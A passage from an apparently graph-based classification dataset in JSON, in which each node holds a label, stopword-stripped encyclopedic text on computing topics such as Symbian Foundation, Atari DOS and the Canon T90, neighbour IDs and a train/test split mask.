      7780,
      6502,
      9796,
      1896,
      11330,
      8747,
      2316,
      8843,
      4468,
      2262,
      7577
    ],
    "mask": "None"
  },
  {
    "node_id": 6275,
    "label": 5,
    "text": "Signaling_Compression:signaling compression signaling compression sigcomp compression method designed especially compression text-based communication data sip rtsp sigcomp originally defined rfc 3320 later updated rfc 4896 negative acknowledgement mechanism signaling compression defined rfc 4077 sigcomp work performed rohc working group transport area ietf sigcomp specifications describe compression schema located application layer transport layer e.g sip udp implemented upon virtual machine configuration executes specific set commands optimized decompression purposes namely udvm universal decompressor virtual machine one strong point sigcomp bytecode decode messages sent sigcomp allows use kind compression schema given expressed bytecode udvm thus sigcomp compatible device may use compression mechanisms exist released without firmware change additionally decoders may already standardised sigcomp may recall code needed sent connection assure message decodable requirement udvm code available compression messages executed virtual machine native code used independent system mechanism signal application conversation e.g given sip session compartment mechanism used given application may given number different independent conversations persisting session status needed/specified per compression schema udvm code",
    "neighbors": [
      10271
    ],
    "mask": "Train"
  },
  {
    "node_id": 6276,
    "label": 2,
    "text": "Symbian_Foundation:symbian foundation symbian foundation non-profit organisation stewarded symbian operating system mobile phones previously owned licensed symbian ltd.. symbian foundation never directly developed platform evangelised co-ordinated ensured compatibility also provided key services members community collecting building distributing symbian source code time competed open handset alliance limo foundation foundation founded nokia sony ericsson ntt docomo motorola texas instruments vodafone lg electronics samsung electronics stmicroelectronics due change device strategy lg motorola left foundation board soon creation later replaced fujitsu qualcomm innovation center operational phase 2009 2010 also provided symbian foundation invited companies join members attracted 200 large number categories following change focus funding board members symbian foundation announced november 2010 would transition legal entity responsible licensing software intellectual property operational responsibilities staff transition result changes global economic market conditions widely attributed stiff competition os ios android along announcement nokia announced would take governance symbian platform nokia major contributor code maintaining code repository platform development ever since purchase symbian ltd. regularly releasing development public repository 17 december 2010 symbian foundation public web sites wiki code repositories shut nokia launched new symbian site however year samsung sony ericsson left foundation favor google open handset alliance android operating system leaving japan ntt docomo major nokia partner announcement nokia partnership microsoft february 2011 transition windows phone os primary platform development symbian stopped outsourced accenture nokia closed service end 2012 transition completed april 2011 symbian foundation remain trademark holder licensing entity non-executive directors involved",
    "neighbors": [
      10754,
      11271,
      546,
      4132,
      3626,
      9262,
      7727,
      10802,
      6207,
      1101,
      7246,
      5201,
      7253,
      3162,
      6748,
      607,
      10851,
      5220,
      1126,
      9320,
      6763,
      11383,
      8315,
      8316,
      8829,
      11391,
      10883,
      9863,
      11405,
      9366,
      1687,
      7319,
      2201,
      6301,
      5290,
      3248,
      7857,
      2235,
      1216,
      199,
      9927,
      8909,
      4305,
      2259,
      10971,
      9443,
      1253,
      8423,
      10482,
      4364,
      11545,
      5406,
      4383,
      1833,
      2862,
      7983,
      2864,
      10030,
      5938,
      321,
      10561,
      7492,
      10053,
      6985,
      341,
      10590,
      10080,
      10599,
      6505,
      2925,
      3969,
      7063,
      9628,
      424,
      11184,
      9137,
      7617,
      9162,
      8147,
      3542,
      6624,
      5603,
      10215,
      495
    ],
    "mask": "None"
  },
  {
    "node_id": 6277,
    "label": 2,
    "text": "Ehcache:ehcache ehcache open source java distributed cache general purpose caching java ee ehcache available apache open source license ehcache developed greg luck starting 2003 2009 project purchased terracotta provides paid support software still open source new major functionalities fast restartability consistency available commercial products like enterprise ehcache bigmemory open source march 2011 wikimedia foundation announced would use ehcache improve performance wiki projects however quickly abandoned testing revealed problems approach name ehcache palindrome",
    "neighbors": [
      2339,
      3560,
      5612,
      4781,
      5677,
      7983,
      10573,
      9144,
      2234
    ],
    "mask": "Test"
  },
  {
    "node_id": 6278,
    "label": 2,
    "text": "Peter_van_der_Linden:peter van der linden peter van der linden born 1963 dutch technologist author worked companies sun microsystems apple computer written books java c linux practical jokes currently 2010 android technology evangelist motorola mobility",
    "neighbors": [
      9665,
      8773,
      5677,
      823,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6279,
    "label": 0,
    "text": "Zeta_distribution:zeta distribution probability theory statistics zeta distribution discrete probability distribution x zeta-distributed random variable parameter probability x takes integer value k given probability mass function ζ riemann zeta function undefined 1 multiplicities distinct prime factors x independent random variables riemann zeta function sum terms formula_8 positive integer k appears thus normalization zipf distribution terms zipf distribution zeta distribution often used interchangeably note zeta distribution probability distribution associated zipf law exponent see also yule–simon distribution zeta distribution defined positive integers formula_9 probability mass function given formula_11 parameter formula_12 riemann zeta function cumulative distribution function given formula_14 generalized harmonic number n th raw moment defined expected value x series right series representation riemann zeta function converges values s-n greater unity thus note ratio zeta functions well defined even n − 1 series representation zeta function analytically continued change fact moments specified series therefore undefined large n moment generating function defined series definition polylogarithm valid formula_19 taylor series expansion function necessarily yield moments distribution taylor series using moments usually occur moment generating function yields obviously well defined finite value since moments become infinite large n use analytically continued terms instead moments obtain series representation polylogarithm formula_23 formula_24 given h harmonic number ζ 1 infinite harmonic series case 1 meaningful however set positive integers density i.e exists n n number members less equal n equal density latter limit also exist cases density example set positive integers whose first digit density nonetheless second limit given exists proportional benford law zeta distribution constructed sequence independent random variables geometric distribution let formula_31 prime number formula_32 random variable geometric distribution parameter formula_33 namely formula_34 random variables formula_35 independent random variable formula_36 defined formula_37 zeta distribution formula_38 stated differently random variable formula_39 infinitely divisible lévy measure given following sum dirac masses formula_40 power-law distributions",
    "neighbors": [
      10621,
      3694,
      10527
    ],
    "mask": "Test"
  },
  {
    "node_id": 6280,
    "label": 4,
    "text": "Comparison_of_backup_software:comparison backup software feature comparison backup software general comparison see list backup software",
    "neighbors": [
      2693,
      7685,
      10503,
      9484,
      1293,
      11157,
      2970,
      10276,
      6565,
      7718,
      10405,
      3629,
      1844,
      4154,
      5313,
      9925,
      1358,
      3794,
      3428,
      11492,
      5737,
      5482,
      9842,
      10101,
      2940,
      8446
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6281,
    "label": 3,
    "text": "Uptime:uptime uptime measure system reliability expressed percentage time machine typically computer working available uptime opposite downtime often used measure computer operating system reliability stability time represents time computer left unattended without crashing needing rebooted administrative maintenance purposes conversely long uptime may indicate negligence critical updates require reboots platforms 2005 novell reported server 6-year uptime although might sound unusual actually common servers maintained industrial context host critical applications banking systems netcraft maintains uptime records many thousands web hosting computers server running novell netware reported shut 16 years uptime due failing hard disk versions microsoft windows include uptime field windows task manager performance tab format hh mm ss days hours minutes seconds output codice_1 command includes system time system boot time field exact text format dependent language locale time given codice_1 reliable take account time spent sleep hibernation thus boot time drifts forward every time computer sleeps hibernates codice_3 command codice_4 sub-command provides date time computer started codice_5 codice_6 variants command codice_7 shorthand codice_6 exact text date format dependent configured language locale uptime determined via windows management instrumentation wmi querying codice_9 property codice_10 class command prompt done using codice_11 command timestamp uses format codice_12 example computer last booted 8 may 2011 16:17:51.822 text lastbootuptime timestamp format vary language locale wmi also queried using variety application programming interfaces including vbscript powershell microsoft formerly provided downloadable utility called codice_13 reports elapsed time days hours minutes seconds time given codice_13 reliable take account time spent sleep hibernation thus boot time drifts forward every time computer sleeps hibernates codice_15 command also available freedos version developed m. aitchison users linux systems use bsd uptime utility also displays system load averages past 1 5 15 minute intervals shows long system since last restarted first number total number seconds system second number much time machine spent idle seconds multi core systems linux versions second number sum idle time accumulated cpu bsd-based operating systems freebsd mac os x sysvr4 uptime command see also method using sysctl call system last boot time openvms systems codice_16 command used dcl command prompt obtain system uptime first line resulting display includes system uptime displayed days followed hours minutes seconds following example command qualifier codice_17 suppresses display per-process detail lines information",
    "neighbors": [
      515,
      516,
      9733,
      9735,
      2568,
      6674,
      8729,
      3109,
      8229,
      8233,
      9780,
      1606,
      3659,
      4174,
      1647,
      9839,
      5759,
      8834,
      6797,
      4750,
      2198,
      4248,
      6812,
      11423,
      4771,
      7847,
      10924,
      2222,
      7356,
      1741,
      1750,
      9946,
      4850,
      7411,
      2811,
      6396,
      3856,
      292,
      296,
      808,
      4398,
      7983,
      10033,
      823,
      1336,
      2364,
      5437,
      7486,
      8517,
      8522,
      2892,
      9557,
      7519,
      8036,
      5492,
      3970,
      10631,
      3976,
      4001,
      11683,
      1444,
      1445,
      7088,
      2995,
      1978,
      960,
      11201,
      965,
      970,
      9677,
      6120,
      9709,
      2545,
      11249,
      2036,
      8692,
      9204,
      6138
    ],
    "mask": "Test"
  },
  {
    "node_id": 6282,
    "label": 4,
    "text": "Trusted_Network_Connect:trusted network connect trusted network connect tnc open architecture network access control promulgated trusted network connect work group tnc-wg trusted computing group tcg tnc architecture first introduced rsa conference 2005 tnc originally network access control standard goal multi-vendor endpoint policy enforcement 2009 tcg announced expanded specifications extended specifications systems outside enterprise network additional uses tnc reported include industrial control system ics scada security physical security specifications introduced tnc work group partial list vendors adopted tnc standards also networking u.s. army planned use technology enhance security computer networks south carolina department probation parole pardon services tested tnc-scap integration combination pilot program",
    "neighbors": [
      704,
      9569,
      5384,
      3851,
      3323,
      2416,
      9137,
      5490,
      6419,
      635,
      7899
    ],
    "mask": "Test"
  },
  {
    "node_id": 6283,
    "label": 3,
    "text": "Macintosh_Quadra_650:macintosh quadra 650 macintosh quadra 650 originally called macintosh centris 650 personal computer designed manufactured sold apple computer february 1993 september 1994 centris 650 introduced alongside smaller centris 610 replacement macintosh iici iivi quadra 700 intended start new midrange centris line computers later 1993 apple decided follow emerging industry trend naming product families target customers – quadra business lc education performa home – folded centris 650 quadra family quadra 650 discontinued without direct replacement september 1994 although recently introduced power macintosh 7100 iivx form factor 650 similar target audience sold price range standard equipment centris 650 models includes onboard video vga support via adapter 3 nubus slots processor direct slot two adb two serial ports external scsi connector four simm slots support 4 8 16 32 mb simms allowing maximum 132 136 mb ram depending configuration ethernet-capable models aaui port system 7.1 included standard minimum required version introduced february 10 1993 introduced october 21 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Train"
  },
  {
    "node_id": 6284,
    "label": 8,
    "text": "WS-Addressing:ws-addressing web services addressing ws-addressing specification transport-neutral mechanism allows web services communicate addressing information essentially consists two parts structure communicating reference web service endpoint set message addressing properties associate addressing information particular message ws-addressing standardized way including message routing data within soap headers instead relying network-level transport convey routing information message utilizing ws-addressing may contain dispatch metadata standardized soap header network-level transport responsible delivering message dispatcher capable reading ws-addressing metadata message arrives dispatcher specified uri job network-level transport done ws-addressing supports use asynchronous interactions specifying common soap header wsa replyto contains endpoint reference epr response sent service provider transmits response message separate connection wsa replyto endpoint decouples lifetime soap request/response interaction lifetime http request/response protocol thus enabling long-running interactions span arbitrary periods time endpoint reference epr xml structure encapsulating information useful addressing message web service includes destination address message additional parameters called reference parameters necessary route message destination optional metadata wsdl ws-policy service message addressing properties communicate addressing information relating delivery message web service ws-addressing originally authored microsoft ibm bea sun microsystems sap submitted w3c standardization w3c ws-addressing working group refined augmented specification process standardization ws-addressing currently specified three parts web services policy attachment endpoint reference ws-paepr specifies mechanism meaning including ws-policy expressions endpoint references ws-paepr w3c member submission",
    "neighbors": [
      9665,
      10020,
      10949,
      7878,
      8070,
      8766,
      8425,
      10829,
      4974,
      3323,
      6357,
      10486,
      5210,
      1851,
      10396,
      3966,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 6285,
    "label": 2,
    "text": "Open_source_in_Kosovo:open source kosovo first project open source kosovo adjustment open office packet december 2003 28 july 2004 albanian team users linux ggsl one first public organizations purpose getting information field open source conference called software freedom day software freedom day known first initiative foss kosovo level conference purpose conference promote free open software issues discussed linux free software open sources general another issue discussed conference operative system linux benefits kde gnome last issues discussed conference ati-kos made surveys five municipal assemblies kosovo may 2005 according survey 98.6 wanted software box mother tongue albanian another survey majority participants believed software box like open office would help increasing productivity different fields interface albanian free libre open source software kosova flossk floss kosova non-governmental organization established march 2009 promotes free open-source software initiative undertaken james michael dupont association volunteers kosovo first results organization seen august year faculty electrical computer engineering held first conference organization conference became tradition held every year conference resulted biggest conference region called “ software freedom kosova 2009 ” promoted free open-source software growth knowledge maps active members members around kosovo abroad february 2009 first person started teaching lessons operative system linux kosovo james micheal dupont courses held idi mainly concerned basic elements using linux benefits systems june year students continued teach lessons linux open street map one projects contributes mostly open source kosovo many members open street map community worked project companies like 'logisticplus companies well beginnings seen map made brod town brod town endangered environmental damages mountains sharri project introduced joachim bergerhoff told flossk un-habitat project flossk helped development project map created community included cities towns brod gjilan gjakovë ferizaj prizren pejë prishtinë interesting project also project shkodra 2010 community helped survivors flooding find streets project 'kumevotu.info project youngsters flossk less two weeks duty project help people find place vote project held 12 december 2010 dedicated especially elections year 2010 project based open street map user gives personal data interesting map find place vote project useful even youngsters participated creating olpc one attractive projects open source kosovo dedicated children olpc project dedicated poor places basic thing laptop used children learn system linux laptop based version fedora basic applications also equipped wifi people could browse internet learn new things project supported since first steps flossk different conferences project welcomed kosovo albanian community open source kosovo active field wikipedia wikimedia community dealing mainly promoting open knowledge wikipedia translating albanian made easier community informed everything initiative made flossk resulted 31,458 articles albanian language 2013 conference held called 'wikiacademykosovo direct way adding articles wikipedia project 'fedora one open source projects also active kosovo promoted distributed two ambassadors kosovo ardian haxha gent thaqi flossk association ambassadors fedras kosovo always organizes parties announce new versions mozilla firefox community active kosovo one projects flossk also promoting mozilla project ambassadors kosovo altin ukshini gent thaqi heroid shehu active promoting mozilla project kosovo also projects platform drupal flossk association unicef lab managed organize training project 6 may dave hall member free software counselor administrator systems australia participants trained knowledge drupal ways using developing cms 29 30 august 2009 first annual conference “ software freedom kosova 2009 ” held premises faculty engineering organized free libre open source software kosova flossk university pristina conference presented public figures world free open source software presented kosovo also james michael dupont – co-founder flossk conference promoted free open-source software also aim exchange experiences speakers audiences 40 topics lectures various fields ranging issues related wikipedia free encyclopedia linux intellectual property licenses building communities programming languages php python given features mentioned conference freely called one extensive southeast europe “ software freedom kosova 2010 ” held second time 25-26 september capital city kosovo prishtina sfk10 organized floss kosovo faculty electrical engineering computer fiek university pristina conference time last time focused 24 lectures kosovo region world main lecturers also guests honor conference renowned hacker fk10 prepared thanks job almost year organizing committee also topics also offered conference held premises faculty electrical computer engineering time spending tradition continued almost middle november exactly 12th 2011 organized next conference “ software freedom kosova 2011 ” one largest activities field 300 participants conference one successful held till local regional speakers full intensive day much topics touched world free software one held day focused topic “ business open source ” introductory remarks made public curious topics presented first half day second part day presentations finally long-awaited final presentation held omer keser google executive spoke google mobile applications detailing number users mobile devices numbers territories world development mobile phone use across different states conference focused aim meeting point network individuals companies sponsoring also initiating projects benefit people kosovo establishing one european centers floss soon possible result commercial benefits country aim could achieve kosovo businesses public introduce low cost alternatives rather expensive proprietary software promote respect legal licenses introduce public best methods localization software knowledge kind activity present lecturers business world use floss commercial development projects also present examples companies region using floss competitive leg outsourcing european market moreover presenting free code build helps entry level professionals companies build skills work leader towards value added projects open source software conference related developments knowledge culture mapping held prishtina kosovo largest conference kind region conference organized free libre open source kosova flossk kosovo association information oommunication technology ipko foundation faculty electrical engineering university pristina conference focused web technologies standards-based vendor html5 javascript like especially important consider recent developments global scene related touch-optimized applications mobile web fact software development kosovo centers web technologies conference held 8-9 september faculty electrical computer engineering prishtina software freedom kosova 2013 nonprofit conference 5th time edition organized flossk new details released regarding agenda speakers presented 7 september 2013 first day conference topics discussed include mobile open web hacker spaces data protection freelancing code sharing scaling cloud one first time changed traditional location organizing faculty education university pristina 170 participants many speakers welcome note done arianit dobroshi altin ukshini ardian haxha thankful anyone presented speakers donators lecture presented alex lakatos java script developer mozilla representative based cluj-napoca redon skikuli mozilla representative one co-founders design everview tirana arianit dobroshi one main member since beginning flossk arbnor hasani currently involved innovations lab kosovo design center ana risteska contributor gnome project burim shala wordpress theme developer two next days conference held place focused practical things participants like tuning postagre sql bert desmet awesome html5/css3 vleran dushi wordpress template development burim shala wmkit arduino workshop redon sikuli november 2004 klina municipality started project change computer network linux openoffice.org first part project charged firefox openoffice.org second part charged linux 3rd 6 november year 70 municipality computer network english language openoffice.org firefox albanian proliferation open source software products benefits many companies government kosovo costs significantly lower security higher undp foss club also trained municipal employees survey conducted end training 100 employees stated prefer software albanian language project translation openoffice.org albanian language started year undp foss team consisted members bulgaria kosovo 4 june 2010 richard stallman activist programmer free software visited kosovo lectured topic free digital society national library kosovo lecture freedom digital society threats welcomed large number participants lecture richard stallman mentioned many countries digital freedom directly violated denmark australia countries many webpages closed unclear reasons emphasized presence free software freedom educational institutions really necessary countries want advance societies use free software want dependent software pay also emphasized today meeting minister education kosovo offered help implementation free software schools kosovo help country develop free independent weak working project powerful give others also opportunity get knowledge freedom software richard stallman end richard stallman answered many questions put forth participants room 22-24 february faculty education near university pristina held first academy called wikiacademykosovo idea conference promote kosovo digital world emphasize good things new qualitative articles pictures wikimedia propaganda present kosovo threat idea kosovo country academy revealed articles cultural heritage social issue geography institutions economy tourism also starting point improve actual image kosovo number mentors wikipedia present event advised writers writings result writings became qualitative winners academy writings academy supported ministry internal affairs republic kosovo great britain ambassy royal ambassy norway british council ipko foundation kosovar organization flossk",
    "neighbors": [
      9665,
      8644,
      3462,
      9579,
      10413,
      9455,
      5078,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6286,
    "label": 4,
    "text": "Information_repository:information repository information technology repository central place aggregation data kept maintained organized way usually computer storage may aggregation data accessible place storage may also imply ability selectively extract data concept universal digital library described within reach 2012 la times article universal digital library within reach told google attempts mass-digitize termed orphan works out-of-print copyrighted works u.s copyright office european union working google reached agreements france lets publisher choose works scanned sold contrast google trying usa free digitize sell works unless copyright holders opted deal still unsuccessful attempts develop called information repository underway decades federated information repository easy way deploy secondary tier data storage comprise multiple networked data storage technologies running diverse operating systems data longer needs primary storage protected classified according captured metadata processed de-duplicated purged automatically based data service level objectives requirements federated information repositories data storage resources virtualized composite storage sets operate federated environment federated information repositories developed mitigate problems arising data proliferation eliminate need separately deployed data storage solutions concurrent deployment diverse storage technologies running diverse operating systems feature centralized management deployed data storage resources self-contained support heterogeneous storage resources support resource management add maintain recycle terminate media track off-line media operate autonomously since one main reasons implementation federated nformation repository reduce maintenance workload placed staff traditional data storage systems federated information repositories automated automation accomplished via policies process data based time events data age data content policies manage following data processed according media type storage pool storage technology federated information repositories intended reduce staff workload designed easy deploy offer configuration flexibility virtually limitless extensibility redundancy reliable failover federated information repositories feature robust client based data search recovery capabilities based permissions enable end users search information repository view information repository contents including data off-line media recover individual files multiple files either original network computer another network computer",
    "neighbors": [
      1668,
      3366,
      1801,
      4233,
      3692,
      7983,
      531,
      756,
      10711,
      3388
    ],
    "mask": "None"
  },
  {
    "node_id": 6287,
    "label": 4,
    "text": "Centurion_guard:centurion guard centurion guard pc hardware software based security product developed centurion technologies released 1996 many different releases versions product many distributed bill melinda gates foundation computers donated libraries",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6288,
    "label": 4,
    "text": "Detection_of_Intrusions_and_Malware,_and_Vulnerability_Assessment:detection intrusions malware vulnerability assessment detection intrusions malware vulnerability assessment dimva event annual conference designed serve general forum discussing malware vulnerability computing systems attacks advancing computer security exchange ideas one projects german informatics society gi according official dimva website 2017 event year dimva brings together international experts academia industry government present discuss novel research areas said conference held 6 july 7 july city bonn germany sponsored entities google rohde schwarz vmray conference report demonstrated externally manipulate alfa romeo giulietta networked safety systems essentially hack vehicle attracted notice publications fiat chrysler authority",
    "neighbors": [
      5636,
      7560,
      1622,
      7515,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6289,
    "label": 2,
    "text": "Atari_DOS:atari dos atari dos disk operating system used atari 8-bit family computers operating system extensions loaded memory required order atari computer manage files stored disk drive extensions operating system added disk handler file management features important extension disk handler atari dos 2.0 file management system fms implementation file system loaded floppy disk meant least additional ram needed run dos loaded several versions atari dos available first version released 1979 atari using cross assembler data general aos first version dos atari commands accessible menu bundled 810 disk drives version entirely memory resident made fast occupied memory space second popular version dos atari bundled 810 disk drives early 1050 disk drives considered lowest common denominator atari doses atari-compatible disk drive read disk formatted dos 2.0s dos 2.0s consisted codice_1 codice_2 codice_1 loaded memory codice_2 contained disk utilities loaded user exited dos addition bug fixes dos 2.0s featured improved codice_5 support ability automatically run atari executable file named codice_6 since user memory erased codice_2 loaded option create codice_8 file added stored user memory temporary file codice_8 restored codice_2 unloaded previous menu option dos 1.0 codice_11 replaced codice_12 dos 2.0s version 2.0s single-density disks 2.0d double-density disks 2.0d shipped 815 dual disk drive expensive incompatible standard 810 thus sold small number making dos version 2.0d rare unusual new version dos came originally bundled 5.25-inch atari 1050 disk drive made use new enhanced density ed capability referred atari dual density confused later extra-high density ed perpendicular recording floppy disks offered 1050 increased storage 88 kb 130 kb per disk single density 88 kb formatting option maintain compatibility older atari 810 disk drives organizing sectors blocks atari anticipating larger capacity floppy disks resulted incompatibility dos 2.0s files converted dos 3 could converted back dos 2.0 result dos 3 extremely unpopular gain widespread acceptance amongst atari user community dos 3 provided built-in help via atari help key and/or inverse key help files needed present system dos disk function properly dos 3 also used special xio commands control disc operations within basic programs version 2.5 upgrade 3.0 listening complaints customers atari released improved version previous dos allowed use enhanced density disks utility read dos 3 disks additional option added menu codice_13 format single-density disks dos 2.5 shipped 1050 disk drives early xf551 disk-drives included utilities codice_14 codice_15 codice_16 codice_17 dos 4.0 designed never-released 1450xld rights returned author michael barall placed public domain later published antic software dos 4.0 used blocks instead single sectors supported single enhanced double density well single- double-sided drives dos 4.0 compatible dos 2 3 disks could read files also automatically switch densities necessary go menu manually select correct density dos xe supported double-density double-sided capabilities atari xf551 drive well burst i/o dos xe used new disk format incompatible dos 2.0s dos 2.5 requiring separate utility reading older 2.0 files also required bank-switched ram run 400/800 machines supported date-stamping files sub-directories dos xe last dos made atari atari 8-bit family many doses released manufacturers third-party drives anyone made drive modifications anyone dissatisfied available doses often doses could read disks higher densities could set drive read disks faster using warp speed ultra-speed techniques doses except spartados dos 2.0 compatible someone atari hacker community modified dos 2.0 add features allow use dual density disk drives look feel dos 2.0 one new feature added radix one could use translate hexadecimal numbers base 10 base 10 hex menu driven dos compatible dos 2.0 among first third-party dos programs support double-density drives many enhancements including sector copying verifying speed checking turning on/off file verifying drive reconfiguration published rana systems written john chenoweth ron bieber last version 8.2d dos produced optimized systems software compatible dos 2.0 allowed use double density floppies unlike atari dosses used command line instead menu dos xl provided menu program addition command line dos could read ss/sd ss/ed ss/dd ds/dd disks made use known methods speeding disk-reads supported various third-party drive manufacturers published technical support written paul nicholls menu driven dos enhanced features sorts disk directory listings set display options file directory compressed display deleted files undelete advanced features required proprietary top-dos format published eclipse software written r. k. bennett dos supports turbo 1050 happy speedy xf551 us doubler highspeed drives xl/xe published martin reitershan computertechnik written herbert barth frank bruchhäuser dos adds ability use sub-directories supports hard-drives published wordmark systems includes complete source code dos used command-line interface compatible dos 2.0 could read dos 2.0 disks supports subdirectories hard drives capable handling filesystems sized 16 mb included capability create primitive batch files sophisticated version spartados strongly resembles ms-dos look feel shipped 64 kb rom cartridge spartados compatible dos fact renamed version spartados 3.x due legal reasons realdos shareware stephen j. carden ken ames spartados compatible dos last version 1.30 released december 1995 much lower memory footprint compared original spartados use ram rom xl/xe machines allowing used older atari 400/800 models bw-dos freeware jiří bernasek xdos freeware stefan dorndorf number different formats existed atari disks atari dos 2.0s single-sided single-density disk 720 sectors divided 40 tracks formatting 707 sectors free 128-byte sector used last 3 bytes housekeeping data bytes used file number next sector leaving 125 bytes data meant disk held 707 × 125 88,375 bytes user data single-density disk holding mere 88 kb per side remained popular atari 8-bit disk format throughout series lifetime almost commercial software continued sold format variants modified copy protection since compatible atari-made disk drives 1978 percom established double-density layout standard manufacturers atari-compatible disk drives indus amdek rana —except atari itself— followed configuration block 12 bytes defines disk layout",
    "neighbors": [
      96,
      3841,
      3426,
      2179,
      9762,
      5925,
      10818,
      2383,
      5359,
      6289,
      2290,
      3315,
      532,
      2933,
      6675,
      7983,
      9840,
      7870
    ],
    "mask": "None"
  },
  {
    "node_id": 6290,
    "label": 5,
    "text": "Channel_bank:channel bank telecommunications channel bank device performs multiplexing demultiplexing demux group communications channels analog digital telephone lines one channel higher bandwidth higher digital bit rate ds-1 t1 circuit channels sent simultaneously single cable called trunkline channel bank may located telephone exchange enterprise telephone closet enclosure breaks individual telephone lines high-capacity telephone trunk line connected central telephone office enterprise pbx system",
    "neighbors": [
      8192,
      7490,
      2787,
      1967,
      2994,
      3156
    ],
    "mask": "Train"
  },
  {
    "node_id": 6291,
    "label": 6,
    "text": "LizardFS:lizardfs lizardfs open source distributed file system posix-compliant licensed gplv3 released 2013 fork moosefs lizardfs distributed scalable fault-tolerant file system achieved spreading data several physical servers associated physical data storage storage presented end-user single logical name space file system designed possible add disks servers “ fly ” without need server reboots shut-downs lizardfs used underlying distributed file system product developed cloudweavers uses opennebula cloud management platform marketed hyper-converged infrastructure possible use cases include storage cloud hosting services render farms backups high availability native microsoft windows client licensed features available support contract alternatively time-limited trial version windows client available high availability achieved manually scripting",
    "neighbors": [
      3909,
      2314,
      6797,
      7983,
      823,
      728,
      2395,
      3582,
      6591
    ],
    "mask": "Test"
  },
  {
    "node_id": 6292,
    "label": 3,
    "text": "Hundra_(video_game):hundra video game hundra action game developed spanish studio zeus software published dinamic software amstrad cpc msx zx spectrum 1988 loosely inspired 1983 film hundra based hundra well received spanish press including review scores 44/50 amstrad accion 9/10 micromania game famous erotic cover art best title art 1988 award microhobby",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6293,
    "label": 2,
    "text": "Alsamixer:alsamixer alsamixer graphical mixer program advanced linux sound architecture alsa used configure sound settings adjust volume ncurses user interface require x window system supports multiple sound cards multiple devices top-left corner alsamixer area show basic information card name mixer chip name current view mode currently selected mixer item mixer item switched displayed name volume bars located basic information area scroll left/right controls put single screen name control shown bottom volume bars currently selected item drawn red and/or emphasized mixer control volume capability shows box current volume filled box volume percentages displayed volume bar left right channels mono control one value shown mixer control turned mute appears volume bar turned green appears instead toggle switch via key mixer control capture capability capture flag appears volume bar capture turned -- -- -- shown capture red appears capture switch turned addition l r letters appear left right side indicate left right channels turned controls enumeration list n't show boxes texts indicate currently active item change item via up/down keys alsamixer three view modes playback capture playback view controls related playback shown similarly controls capture recording shown capture view view mode shows controls current view mode displayed top-left position together mixer name etc default view mode playback view changed via -v option also view mode switched via keyboard commands alsamixer comes tui started different keys used configure sound cards tui recognizes following keyboard commands configure available soundcards commands shown upper case also given lower case reminded keystrokes hit key press open list available sound cards precise list cards advanced linux sound architecture alsa device driver successfully loaded either boot-up per codice_1 command command codice_2 print list currently loaded device drivers arrow keys used select channel device depending preferred terminology also use n next p previous keys control volume currently selected device also use purpose left right signals affected control independently use increase decrease volume left channel increases volume right channel decreases function keys used change view modes switch help mode proc info mode via f1 f2 keys respectively terminals ca n't use function keys like gnome terminal keys used alternatively help proc modes keys used switch playback capture view mode respectively tab key toggles current view mode circularly quit program alt+q hitting esc key please note might need hit esc twice terminals since regarded prefix key",
    "neighbors": [
      11427,
      7983,
      7509,
      823,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6294,
    "label": 3,
    "text": "Canon_T90:canon t90 canon t90 introduced 1986 top line canon series 35 mm single-lens reflex slr cameras last professional-level manual-focus camera canon last professional camera use canon fd lens mount although overtaken autofocus revolution canon new incompatible eos electro-optical system year production t90 pioneered many concepts seen high-end canon cameras present day particularly user interface industrial design high level automation due ruggedness t90 nicknamed tank japanese photojournalists many still rated highly even 20+ years introduction previous canon cameras wholly in-house design projects t90 canon brought german industrial designer luigi colani collaboration canon designers final design composed colani ideas kunihisa ito ods co. ltd. incorporating colani distinctive bio-form curvaceous shapes canon considered colani contribution important enough present first production t90 body engraved name computer-aided design techniques introduced canon t90 well use computer controlled cnc milling machines make molding dies shell much work went human factors engineering create ergonomic user interface camera form previous cameras largely dictated required locations mechanical controls body film advance lever rewind crank shutter speed dial shutter release etc t90 film transport control longer required others longer mechanically linked gave designers freedom shape camera make easier control hold place controls way suited user rather mechanical design t90 introduced features still used slr cameras today use lcd screen top camera right hand side new t90 – introduced t70 – t90 refined show even camera information control wheel located behind shutter release convenient right index finger used adjust camera settings conjunction buttons located right thumb left-hand side camera design still used canon digital slrs current production t90 includes integral motor driven film advance focal plane shutter mirror aperture cocking rewind functions canon broke new ground powered features camera previously cameras used one powerful electric motor geared functions instead t90 three coreless micromotors within body close functions drive maximum mechanical advantage one used wind film achieving rate 4.5 frames per second second prepares shutter mirror etc next shot third motor powers rewind function driven four aa batteries base camera control camera systems t90 uses dual cpu architecture main low-power cpu runs 32 khz sub-cpu runs 1 mhz powered needed main cpu handles lcd display overall state sub-cpu handles exposure calculations viewfinder display control camera motors architecture provides lower power usage cpus plus integrated circuits components mounted several flexible circuit boards fit around camera structure coin-type lithium battery main circuit board retains camera settings aa batteries removed user-serviceable part fails camera brought service center battery replaced canon technician expected battery life order five years although depends variety factors including duration periods without main battery 4xaa power t90 canon developed sophisticated light-metering system yet although introduced novel metering techniques assembled majority metering techniques developed one easy-to-use system first took metering options new f-1—center-weighted average metering partial area metering spot metering—and makes available press button turn 